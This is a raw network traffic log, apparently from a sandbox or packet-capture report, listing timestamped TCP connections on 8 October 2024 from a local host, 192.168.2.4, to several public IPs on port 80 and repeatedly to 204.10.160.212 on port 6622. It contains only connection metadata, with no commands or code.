                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.400556087 CEST5007080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.400583982 CEST5007080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.405458927 CEST805007047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.405482054 CEST805007047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.559310913 CEST805006834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.559592009 CEST5006880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.559676886 CEST805006834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.559725046 CEST5006880192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.564485073 CEST805006834.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.688460112 CEST5007580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.693376064 CEST805007547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.693460941 CEST5007580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.693607092 CEST5007580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.693629980 CEST5007580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.698448896 CEST805007547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:13.698715925 CEST805007547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.223666906 CEST500776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.229299068 CEST662250077204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.229410887 CEST500776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.233517885 CEST500776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.238631010 CEST662250077204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.746372938 CEST805007047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.746627092 CEST5007080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.746841908 CEST805007047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.746891975 CEST5007080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.751524925 CEST805007047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.988528967 CEST5008380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.994457006 CEST805008334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.994596004 CEST5008380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.994684935 CEST5008380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:14.994709969 CEST5008380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.002204895 CEST805008334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.002533913 CEST805008334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.044320107 CEST805007547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.045006037 CEST805007547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.045074940 CEST5007580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.046549082 CEST5007580192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.051328897 CEST805007547.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.667332888 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.672238111 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.672346115 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.672519922 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.672548056 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.677468061 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.677476883 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.708983898 CEST662250077204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.709045887 CEST500776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.709191084 CEST500776622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.713990927 CEST662250077204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.721455097 CEST805008334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.721570015 CEST805008334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.721597910 CEST5008380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.721659899 CEST5008380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.726495028 CEST805008334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:15.866580009 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.287465096 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.287564039 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.290257931 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.290714979 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.295897007 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.297399044 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.723579884 CEST500966622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.729011059 CEST662250096204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.729198933 CEST500966622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.733165979 CEST500966622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:16.738245010 CEST662250096204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.006650925 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.007028103 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.007102013 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.007152081 CEST5008980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.012182951 CEST805008913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.391959906 CEST5010280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.396836996 CEST805010234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.397001028 CEST5010280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.397072077 CEST5010280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.397072077 CEST5010280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.401886940 CEST805010234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.401911020 CEST805010234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.632180929 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.632328033 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.632874012 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.634572983 CEST5009080192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.637352943 CEST805009047.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.758637905 CEST5010380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.763549089 CEST805010318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.763614893 CEST5010380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.763788939 CEST5010380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.763806105 CEST5010380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.768543005 CEST805010318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:17.768990993 CEST805010318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.130628109 CEST805010234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.130836964 CEST5010280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.131115913 CEST805010234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.131302118 CEST5010280192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.135946989 CEST805010234.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.210458994 CEST662250096204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.210531950 CEST500966622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.210587025 CEST500966622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.215471983 CEST662250096204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.227437019 CEST805010318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.227592945 CEST5010380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.227677107 CEST805010318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.227724075 CEST5010380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.232559919 CEST805010318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.276532888 CEST5010880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.281641960 CEST805010813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.281702042 CEST5010880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.281915903 CEST5010880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.281943083 CEST5010880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.286705971 CEST805010813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.286716938 CEST805010813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.398260117 CEST5010980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.403196096 CEST80501093.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.403335094 CEST5010980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.403551102 CEST5010980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.403551102 CEST5010980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.408438921 CEST80501093.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.408993959 CEST80501093.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.868707895 CEST80501093.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.868947983 CEST80501093.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.870537996 CEST5010980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.873435974 CEST5010980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:18.878535032 CEST80501093.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.224009037 CEST501156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.228948116 CEST662250115204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.229046106 CEST501156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.236852884 CEST501156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.241624117 CEST662250115204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.245194912 CEST5011680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.250030041 CEST805011644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.250114918 CEST5011680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.250225067 CEST5011680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.250256062 CEST5011680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.255100965 CEST805011644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.255156994 CEST805011644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.610471964 CEST805010813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.610580921 CEST805010813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.610615015 CEST5010880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.610646963 CEST5010880192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.615843058 CEST805010813.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.720422029 CEST5012180192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.725409985 CEST805012134.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.725667000 CEST5012180192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.725816965 CEST5012180192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.725835085 CEST5012180192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.730634928 CEST805012134.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.730680943 CEST805012134.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.738152981 CEST805011644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.738327026 CEST5011680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.738379955 CEST805011644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.738497019 CEST5011680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:19.743340969 CEST805011644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.084300995 CEST5012380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.089270115 CEST80501233.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.090697050 CEST5012380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.090920925 CEST5012380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.090920925 CEST5012380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.095721960 CEST80501233.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.095954895 CEST80501233.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.468688011 CEST805012134.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.468863010 CEST805012134.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.468935966 CEST5012180192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.469938040 CEST5012180192.168.2.434.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.474812984 CEST805012134.246.200.160192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.484206915 CEST5012880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.489157915 CEST805012818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.489598036 CEST5012880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.490500927 CEST5012880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.490767956 CEST5012880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.495325089 CEST805012818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.495569944 CEST805012818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.708878040 CEST662250115204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.709018946 CEST501156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.709018946 CEST501156622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.713908911 CEST662250115204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.907075882 CEST80501233.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.907272100 CEST80501233.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.907366991 CEST5012380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.907812119 CEST5012380192.168.2.43.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:20.912787914 CEST80501233.254.94.185192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.212795019 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.217645884 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.217878103 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.218652010 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.218652010 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.223603010 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.223731041 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.676742077 CEST501366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.682141066 CEST662250136204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.684827089 CEST501366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.691437006 CEST501366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.696388960 CEST662250136204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.827528954 CEST805012818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.828114033 CEST805012818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.828197002 CEST5012880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.828249931 CEST5012880192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.833364964 CEST805012818.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.848566055 CEST805013285.214.228.140192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.851932049 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.857374907 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.857470989 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.857755899 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.857755899 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.862957954 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.863017082 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:21.984330893 CEST5013280192.168.2.485.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.044560909 CEST5013980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.049787045 CEST805013947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.049854040 CEST5013980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.050046921 CEST5013980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.050070047 CEST5013980192.168.2.447.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.055135012 CEST805013947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:22.055155993 CEST805013947.129.31.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.140851021 CEST662250136204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.140948057 CEST501366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.141446114 CEST501366622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.146220922 CEST662250136204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.227308989 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.227453947 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.227509022 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.230907917 CEST5013780192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.235697985 CEST805013713.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.253992081 CEST5014080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.258907080 CEST805014018.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.259006023 CEST5014080192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:23.259179115 CEST5014080192.168.2.418.208.156.248
